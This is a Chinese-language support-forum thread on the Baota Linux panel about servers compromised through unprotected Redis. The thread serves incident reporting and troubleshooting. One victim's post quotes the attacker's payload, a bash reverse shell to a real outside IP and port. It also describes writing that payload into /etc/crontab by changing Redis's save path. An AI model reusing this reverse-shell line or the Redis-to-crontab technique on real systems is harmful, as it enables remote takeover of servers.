当前位置:论坛首页 > Linux面板 > 讨论

【已解答】Py3.7.9

发表在 Linux面板2023-11-2 17:40 [复制链接] 8 2583

本帖最后由 堡塔运维小林 于 2023-11-3 10:39 编辑

通过python漏洞修改 redis、请问一下怎么处理呢
使用道具 举报 只看该作者 回复
发表于 2023-11-2 17:44:54 | 显示全部楼层
我这边使用宝塔出现了这个问题。被别人修改了redis的值
使用道具 举报 回复 支持 反对
发表于 2023-11-2 17:45:32 | 显示全部楼层
您好,这边不是很能理解您的意思,能否具体的描述一下呢
使用道具 举报 回复 支持 反对
发表于 2023-11-2 17:52:39 | 显示全部楼层
感谢像这篇文章的情况https://cloud.tencent.com/developer/article/1483850?areaSource=102001.13&traceId=ntx3RQ7EJ8G8SIiTVMlGN     他把我的redis的值修改后, 仍了个反弹shell的命令进去。
使用道具 举报 回复 支持 反对
发表于 2023-11-2 17:56:53 | 显示全部楼层
CVE-2023-24329  好像这个漏洞也可以修改redis ,你们自带的python修复这个漏洞没
使用道具 举报 回复 支持 反对
发表于 2023-11-2 18:35:25 | 显示全部楼层
请问一下有什么处理方式吗
使用道具 举报 回复 支持 反对
发表于 2023-11-3 10:39:01 | 显示全部楼层
您好,这边问了一下负责人,说是面板上面带的python是没有影响的,不会出现这样的一个情况
使用道具 举报 回复 支持 反对
发表于 2023-11-3 11:19:07 | 显示全部楼层
发现一个被攻击漏洞,用的宝塔7.9.8版本,redis没有设置密码,但没有开外部端口,黑客通过宝塔面板端口修改redis的值,添加了一段mars  **** root bin/sh bash -i >&/dev/tcp/8.137.10.80/4050 0>&1 键值对,然后修改redis保存路径和名字到etc/crontab 。机器就被控制。发现后关闭所有端口排查问题,只要开放宝塔端口,就会被一波带走,通过netstat查看也发现宝塔端口pyrhon3上有国外ip连接。
使用道具 举报 回复 支持 反对
发表于 2023-11-3 11:35:52 | 显示全部楼层
我们默认都是使用的request 包请求的。
并且 像url 解析漏洞。也得有一个可控的请求点。才能成为漏洞。

使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表